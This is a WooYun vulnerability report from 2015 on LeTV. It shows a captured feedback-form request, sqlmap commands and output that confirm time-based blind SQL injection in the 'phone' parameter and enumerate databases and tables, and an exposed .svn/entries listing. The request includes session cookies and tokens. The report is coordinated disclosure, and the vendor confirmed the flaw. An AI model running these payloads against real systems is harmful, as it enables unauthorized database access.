当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116457

漏洞标题:乐视漏洞小礼包之某处SQL注入+SVN泄露

相关厂商:乐视网

漏洞作者: 小老大

提交时间:2015-05-27 12:15

修复时间:2015-07-11 17:32

公开时间:2015-07-11 17:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经确认,细节仅向厂商公开
2015-06-06: 细节向核心白帽子及相关领域专家公开
2015-06-16: 细节向普通白帽子公开
2015-06-26: 细节向实习白帽子公开
2015-07-11: 细节向公众公开

简要描述:

乐视不错!我也来支持下!

详细说明:

到处看了下,发现有个新东西,到处点点,居然有时打不开视频,然后提交反馈,抓包:

POST /vplay/feedback.php HTTP/1.1
Host: stat.letv.com
Proxy-Connection: keep-alive
Content-Length: 8870
Origin: http://player.hz.letv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://player.hz.letv.com/hzplayer.swf/v_list=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ark_uuid=9be6a217f30f42f7af8a2981e69e0bbc; vjuids=7affbae17.14cb2993a04.0.ffa42a0b; tj_UID=14289280243188785837; pgv_pvi=1159026688;
_jzqa=1.1026984752248182100.1429000360.1429000360.1430185940.2; _jzqx=1.1429000360.1430185940.2.jzqsr=shop%2Eletv%2Ecom|jzqct=/.jzqsr=hao
%2E360%2Ecn|jzqct=/; __xsptplus104=104.5.1430287198.1430287198.1%232%7Cbzclk.baidu.com%7C%7C%7C
%25E4%25B9%2590%25E8%25A7%2586%25E8%25B6%2585%25E7%25BA%25A7%25E6%2589%258B%25E6%259C%25BA%7C%23%23ILK8lugFyLuxqfM1sRAk_K6gppNdDuK8%23;
stat_num=0; m=qq_A954E6209D8A038E304DE8E19F44ADEA; sso_tk=1020c209deEm3R7RMarotbF3Ru0gyWLECYhg9Cs1JCKOOwVQy02m2qUim1m3LCOplMUM9XkEvN;
sso_nickname=user33363198; casflag=1; ssouid=33363198; sso_picture=http%3A%2F%2Fi1.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d20841f1680.jpg;
sso_icon=http%3A%2F%2Fi2.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d1e3f924509.jpg%2Chttp%3A%2F%2Fi2.letvimg.com%2Fuser
%2F201403%2F22%2F532cf8d1f2fb56278.jpg%2Chttp%3A%2F%2Fi1.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d20841f1680.jpg%2Chttp%3A%2F
%2Fi0.letvimg.com%2Fuser%2F201403%2F22%2F532cf8d21eb749619.jpg; utype=3; lfrom=my;
u=eyJ1aWQiOiIzMzM2MzE5OCIsIm5pY2tuYW1lIjoicXFfQTk1NEU2MjA5RDhBMDM4RTMwNERFOEUxOUY0NEFERUEiLCJlbWFpbCI6IiIsIm5hbWUiOiJxcV9BOTU0RTYyMDlEOEEwMzhF
MzA0REU4RTE5RjQ0QURFQSIsInNzb3VpZCI6IjMzMzYzMTk4In0%3D; ui=9f7681nEubgBiJJGDK7moePMO%2FF0vgqL%2BXc9UvSW9WZ3sVsXpRo90GKEYURv7vgrBA8xXYJohXbAA
%2BulrGeE7%2FrDEa2AiVmEiG9KvI69eCOLw%2Bke83jlQk96LHcBsid5%2BFbT%2Br6l1pXwtW4NpELzklg
%2BpJDHoDZbyzJuJNpMZDBkWnInkLXt2R86SqfEk4FpjcRHLmiiw9U1ZBoVx%2F4btQuS5xIYUnyfGXBygA; muv=2882877681.1431451552.3020117ca6;
ALLYESID4=A6Ni/1rUJNwDA7JH; narrow=1; tj_lc=F2A8F1B08E555518F03387C9F8A8CFBA73155B97; tj_clickcount=20; his_vid=2092585-21126856-21127435-
21126530-21126321-21125641-21125295-21119655-21139218-21136231; vjlast=1428925529.1432150832.11; mlta=%7B%22mltn%22%3A%7B%226082%22%3A%5B
%224730246136456383104%3E1%3E1432155973383%3E1%3E1432155973383%3E4613147526633669933%3E1432155973383%22%2C1447707973226%5D%7D%2C%22mlti%22%3A
%7B%226082%22%3A%5B%22143215597308687432%22%2C1447707973086%5D%7D%2C%22mlts%22%3A%7B%226082%22%3A%5B%225%22%2C1447707973226%5D%7D%2C
%22mltmapping%22%3A%7B%220%22%3A%5B1%2C1434747973226%5D%7D%7D; tj_uuid=14326963744265630327; MixCook=tk_checked-1; newVideo=%7B
%221%22%3A13%2C%222%22%3A69%2C%223%22%3A221%2C%224%22%3A471%2C%225%22%3A95%2C%228%22%3A0%2C%229%22%3A24%2C%2211%22%3A139%2C%2214%22%3A7%2C
%2216%22%3A3%2C%2217%22%3A0%2C%2219%22%3A0%2C%2220%22%3A13%2C%2222%22%3A157%2C%2223%22%3A61%2C%2230%22%3A5581%2C%2232%22%3A0%2C
%2233%22%3A0%2C%2234%22%3A6%2C%2235%22%3A0%2C%2236%22%3A1%2C%2238%22%3A0%7D; baidu_session=baidu
phone=13311111111&email=&data=mmsid%3Dnull%26vid%3D%26typeFrom%3Dlepai%26version%3DLETV%5F3%2E3%2E4%26ref%3Dhttp%253A%252F%252Fwww%2Ebaidu
%2Ecom%252Fs%253Fwd%253Dsite%25253Astarcast%2Eletv%2Ecom%2526pn%253D60%2526oq%253Dsite%25253Astarcast%2Eletv%2Ecom%2526ie%253Dutf%2D8%2526rsv
%5Fpq%253Dd3e85ee400003853%2526rsv%5Ft%253D5e16Ao2yye%25252Fx%25252B43O06ROmf5aZSw%25252BtJfun%25252BntVU%25252Bgb%25252FoCklWZKXWcNvLpnxo
%26errno%3D555&errno=555&log=%3C%21DOCTYPE%20html%20PUBLIC%20%27%2D%2F%2FW3C%2F%2FDTD%20XHTML%201%2E0%20Transitional%2F%2FEN%27%20%27http%3A
%2F%2Fwww%2Ew3%2Eorg%2FTR%2Fxhtml1%2FDTD%2Fxhtml1%2Dtransitional%2Edtd%27%3E%3Chtml%20xmlns%3D%27http%3A%2F%2Fwww%2Ew3%2Eorg%2F1999%2Fxhtml
%27%3E%3Chead%3E%3Cmeta%20http%2Dequiv%3D%27Content%2DType%27%20content%3D%27text%2Fhtml%3B%20charset%3Dutf%2D8%27%2F%3E%3Ctitle%3EArthropod
%20Log%3C%2Ftitle%3E%3Cstyle%20type%3D%27text%2Fcss%27%3Ebody%20%7Bbackground%3A%20%23151515%3Bfont%2Dfamily%3A%20Verdana%2C%20Arial%2C
%20Helvetica%2C%20sans%2Dserif%3Bfont%2Dsize%3A%2015px%3Bcolor%3A%20%23fefefe%3B%7D%23main%2Dcontainer%7Bmargin%3A%2010px%3Bclear%3A%20both
%3B%7D%23container%7Bbackground%3A%20%23252525%3Bborder%3A%201px%20solid%20%23000%3Bpadding%3A%2020px%3B%7D%23header%20%7Bfont%2Dfamily%3A
%20%27Trebuchet%20MS%27%2C%20Verdana%2C%20Arial%2C%20Helvetica%2C%20sans%2Dserif%3Bfont%2Dsize%3A%2025px%3Bfont%2Dweight%3A%20bold%3Bcolor%3A
%20%23fefefe%3Bheight%3A%2085px%3Bpadding%3A%2010px%3B%7D%3C%2Fstyle%3E%3C%2Fhead%3E%3Cbody%3E%3Cdiv%20id%3D%27main%2Dcontainer%27%3E%3Cdiv
%20id%3D%27header%27%3ELetv%20Log%28%E4%B9%90%E8%A7%86%E6%92%AD%E6%94%BE%E5%99%A8%E6%97%A5%E5%BF%97%29%3Cbr%20%2F%3E%20Date
%3A2015%2D5%2D27%2011%3A41%3A47%20%3C%2Fdiv%3E%3Cdiv%20id%3D%27container%27%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue
%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B0%202015%2D5%2D27%2011%3A32%3A4%20info%5D%20Load%20Config%20Len%200%3C%2Fspan%3E%3C
%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe
%27%20%3E%5B1%202015%2D5%2D27%2011%3A32%3A4%20info%5D%20Load%20Config%20Complete%20None%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E
%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B2%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20%5Bobject%20PluginProxy%5D%20onWholeComplete%20Length%202%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B3%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20System%3A%20win7%20%7C%20chrome%20%7C%20WIN%2011%2C6%2C602%2C180%20%7C%20LETV
%5F3%2E3%2E4%5F20150423%20Kernel%5F20150423%20APS%5F2%2E7%2E2%5F20150526%20%7C%20http%3A%2F%2Fstarcast%2Eletv%2Ecom%2Fplay%2F4650%3C%2Fspan
%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A
%23fefefe%27%20%3E%5B4%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20KernelP2PPlugins%3A%20http%3A%2F%2Fplayer%2Eletvcdn%2Ecom%2Fp
%2F201401%2F20%2Fnewplayer%2F01200947%2FFPLetvPlayer%2Eswf%0Ahttp%3A%2F%2Fplayer%2Eletvcdn%2Ecom%2Flc01%5Fp
%2F201505%2F21%2F18%2F40%2F21%2F21%2Fnewplayer%2F1%2FMPLetvPlayer%2Eswf%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D
%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B5%202015%2D5%2D27%2011%3A32%3A5%20info
%5D%20%5BStat%5D%20http%3A%2F%2Fdc%2Eletv%2Ecom%2Fenv%2F%3Fp1%3D1%26p2%3D10%26p3%3D%2D%26lc%3DF2A8F1B08E555518F03387C9F8A8CFBA73155B97%26uuid
%3DC0F48B29496BEF9ECEF5C939604709C87B0A3D0D%26ip%3D%2D%26mac%3D%2D%26nt%3D%2D%26os%3Dwin7%26osv%3D%2D%26app%3DWIN%2011%2C6%2C602%2C180%26bd
%3D%2D%26xh%3D%2D%26ro%3D1280%5F800%26br%3Dchrome%26r%3D0%2E17611282598227262%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv
%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B6%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20Kernel%2EsetConfig%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item
%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B7%202015%2D5%2D27%2011%3A32%3A5%20info%5D
%20%5Bobject%20AdMediator%5D%20videoRect%EF%BC%9A%20%28x%3D0%2C%20y%3D61%2E05%2C%20w%3D488%2C%20h%3D366%2E9%29%3C%2Fspan%3E%3C%2Fdiv%3E%3C
%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B8%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20Kernel%2EsetAuth%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item
%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B9%202015%2D5%2D27%2011%3A32%3A5%20warn%5D
%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item
%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B10%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20%5BUser%20Data%5D
%2033363198%20qq%5FA954E6209D8A038E304DE8E19F44ADEA%20user33363198%20null%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D
%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B11%202015%2D5%2D27%2011%3A32%3A5%20error
%5D%20%5Bobject%20AuthController%5D%20onTransferFailednull%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E
%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B12%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel
%2EonAuthInvalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E
%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B13%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C
%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe
%27%20%3E%5B14%202015%2D5%2D27%2011%3A32%3A5%20info%5D%20%5BStat%5D%20http%3A%2F%2Fdc%2Eletv%2Ecom%2Fpl%2F%3Fver%3D2%2E0%26ac%3Dinit%26err
%3D555%26ut%3D%2D%26ap%3D1%26p1%3D1%26p2%3D10%26p3%3D%2D%26lc%3DF2A8F1B08E555518F03387C9F8A8CFBA73155B97%26uid%3D33363198%26uuid
%3DE529933A7EABB6137FB58F5939CB095F96B3ED6B%26auid%3D%2D%26cid%3Dnull%26pid%3Dnull%26vid%3D%26vlen%3D0%26ch%3Dlepai%26ty%3D0%26url%3Dhttp
%253A%252F%252Fstarcast%2Eletv%2Ecom%252Fplay%252F4650%26ref%3Dhttp%253A%252F%252Fwww%2Ebaidu%2Ecom%252Fs%253Fwd%253Dsite%25253Astarcast
%2Eletv%2Ecom%2526pn%253D60%2526oq%253Dsite%25253Astarcast%2Eletv%2Ecom%2526ie%253Dutf%2D8%2526rsv%5Fpq%253Dd3e85ee400003853%2526rsv%5Ft
%253D5e16Ao2yye%25252Fx%25252B43O06ROmf5aZSw%25252BtJfun%25252BntVU%25252Bgb%25252FoCklWZKXWcNvLpnxo%26pv%3DCode%253AAlex%5FLETV
%5F4%2E2%2E3%26st%3D%2D%26ilu%3D0%26pcode%3D%2D%26pt%3D0%26weid%3D14326975239758692503%26vt%3D%2D%26prg%3D0%26py%3Dadload%253D1%26r
%3D0%2E1470045349560678%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue
%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E%5B15%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan
%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A
%23fefefe%27%20%3E%5B16%202015%2D5%2D27%2011%3A32%3A5%20fault%5D%20SDK%20Fault%20errorInKernel%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr
%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B17%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv
%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B18%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3Cdiv
%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B19%202015%2D5%2D27%2011%3A32%3A5%20fault%5D%20%5Bobject%20SystemWarnMediator%5D%20Fault%20errorInSdk%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E
%3Cbr%20%2F%3E%3Cdiv%20class%3D%27item%27%3E%3Cdiv%20class%3D%27item%2Dvalue%27%3E%3Cspan%20style%3D%27color%3A%23fefefe%27%20%3E
%5B20%202015%2D5%2D27%2011%3A32%3A5%20warn%5D%20Kernel%2EcloseVideo%20Invalid%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cbr%20%2F%3E%3C%2Fdiv%3E
%3C%2Fdiv%3EAuthor%20%3A%20LinYang%20%E5%BE%AE%E5%8D%9A%3A%3Ca%20href%3D%27http%3A%2F%2Fweibo%2Ecom%2Fopensourceplatform%27%20target%3D
%27%5Fblank%27%3EAdobe%E6%B4%8B%E4%BB%94%3C%2Fa%3E%3C%2Fbody%3E%3C%2Fhtml%3E&content=%E8%A7%86%E9%A2%91%E5%8D%A1%E9%A1%BF%2D123123&mail=null


保存请求,sqlmap跑下,证明:

QQ截图20150527120225.png


QQ截图20150527120310.png


包里面应该多个参数存在注入,时间原因,没跑了,请自测!

漏洞证明:

QQ截图20150527120325.png


[root@Hacker~]# Sqlmap Sqlmap -r E:\6.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's respo
[*] starting at 11:42:57
[11:42:57] [INFO] parsing HTTP request from 'E:\6.txt'
[11:42:57] [INFO] testing connection to the target URL
[11:42:57] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:42:59] [INFO] target URL is stable
[11:42:59] [INFO] testing if POST parameter 'phone' is dynamic
[11:42:59] [WARNING] POST parameter 'phone' does not appear dynamic
[11:42:59] [WARNING] heuristic (basic) test shows that POST parameter 'phone' might not be injectable
[11:42:59] [INFO] testing for SQL injection on POST parameter 'phone'
[11:42:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:43:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:43:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:43:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:43:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:43:06] [INFO] testing 'MySQL inline queries'
[11:43:06] [INFO] testing 'PostgreSQL inline queries'
[11:43:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:43:07] [INFO] testing 'Oracle inline queries'
[11:43:07] [INFO] testing 'SQLite inline queries'
[11:43:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:43:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:43:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:43:10] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:43:22] [INFO] POST parameter 'phone' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:43:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:43:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (pote
[11:43:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:43:30] [INFO] checking if the injection point on POST parameter 'phone' is a false positive
POST parameter 'phone' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 106 HTTP(s) requests:
---
Place: POST
Parameter: phone
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: phone=13311111111' AND SLEEP(5) AND 'Cqxc'='Cqxc&email=&data=mmsid=null%26vid=%26typeFrom=lepai%26version=LETV_3.3
http://player.letvcdn.com/lc01_p/201505/21/18/40/21/21/newplayer/1/MPLetvPlayer.swf</span></div></div><br /><div class='item'><
---
[11:44:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[11:44:24] [INFO] fetching database names
[11:44:24] [INFO] fetching number of databases
[11:44:24] [INFO] retrieved:
[11:44:24] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[11:44:38] [INFO] retrieved:
[11:44:43] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[11:46:25] [INFO] retrieved: vplay
available databases [2]:
[*] information_schema
[*] vplay
[11:46:56] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1
[11:46:56] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\stat.letv.com'
[*] shutting down at 11:46:56
[root@Hacker~]# Sqlmap Sqlmap -r E:\6.txt -D vplay --count --threads 10
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's respo
[*] starting at 11:50:03
[11:50:03] [INFO] parsing HTTP request from 'E:\6.txt'
[11:50:03] [INFO] resuming back-end DBMS 'mysql'
[11:50:03] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: phone
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: phone=13311111111' AND SLEEP(5) AND 'Cqxc'='Cqxc&email=&data=mmsid=null%26vid=%26typeFrom=lepai%26version=LETV_3.3
http://player.letvcdn.com/lc01_p/201505/21/18/40/21/21/newplayer/1/MPLetvPlayer.swf</span></div></div><br /><div class='item'><
---
[11:50:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[11:50:03] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system dat
[11:50:03] [INFO] fetching tables for database: 'vplay'
[11:50:03] [INFO] fetching number of tables for database 'vplay'
[11:50:03] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:50:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[11:50:06] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:50:25] [INFO] adjusting time delay to 1 second due to good response times
5
[11:50:27] [ERROR] invalid character detected. retrying..
[11:50:27] [WARNING] increasing time delay to 2 seconds
[11:50:28] [INFO] retrieved: feedback
[11:51:36] [INFO] retrieved: n
[11:51:56] [ERROR] invalid character detected. retrying..
[11:51:56] [WARNING] increasing time delay to 3 seconds
ew_video
[11:53:59] [ERROR] invalid character detected. retrying..
[11:53:59] [WARNING] increasing time delay to 4 seconds
_day_views
[11:56:58] [INFO] retrieved:
[11:57:14] [ERROR] invalid character detected. retrying..
[11:57:14] [WARNING] increasing time delay to 5 seconds
p
[11:58:20] [ERROR] invalid character detected. retrying..
[11:58:20] [WARNING] increasing time delay to 6 seconds
layer_time
[12:02:28] [INFO] retrieved: s
[12:03:29] [ERROR] unable to properly validate last character value ('t')..
t
[12:03:37] [ERROR] invalid character detected. retrying..
[12:03:37] [WARNING] increasing time delay to 2 seconds
ar_sc


svn泄露:
http://starcast.letv.com/.svn/entries

10
dir
79465
http://svn2.letv.cn/tp/front-end-tv/tag/lepai.letv.com/pc/20150119/php/Html/Admin
http://svn2.letv.cn
2015-05-20T06:46:03.612937Z
79464
xielijiao
svn:special svn:externals svn:needs-lock
21433022-bb36-4ff6-a907-2c018ad81495
favicon.ico
file
2015-05-20T06:48:22.000000Z
6950488799a0ff598be6fd5d0cc5f928
2015-02-11T02:35:09.702296Z
60246
liliangliang
has-props
4286
index.php
file
2015-05-20T06:48:22.000000Z
939428b2e5c56814d7470d58474a8f64
2015-01-15T11:24:20.809322Z
54319
liliangliang
1109
js
dir
res
dir
style
dir


修复方案:

顺便求个手机手机乐码,谢谢:) 乐视好厂商!

版权声明:转载请注明来源 小老大@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-27 17:30

厂商回复:

非常感谢支持乐视安全,可是手机乐码这东西我们也没有>_<,我6月2日12点去乐视商城帮你抢~

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-27 18:04 | jeary ( 普通白帽子 | Rank:296 漏洞数:106 | (:‮.kcaH eb nac gnihtynA))

    厂商人真好.

  2. 2015-06-06 10:08 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

    厂商真好良心厂商呀 洞主激动的可能都磕巴了,学习。

  3. 2015-07-11 18:47 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    厂商真好良心厂商呀 洞主激动的可能都磕巴了,学习。

  4. 2015-07-12 15:56 | 娃哈哈 ( 实习白帽子 | Rank:36 漏洞数:6 | 伟大的科学家)

    厂商真好良心厂商呀 洞主激动的可能都磕巴了,学习。

  5. 2015-07-14 09:06 | 小老大 ( 路人 | Rank:10 漏洞数:1 | http://www.wooyun.org)

    @乐视网 良心厂商,2个月过去了,说好的公仔呢?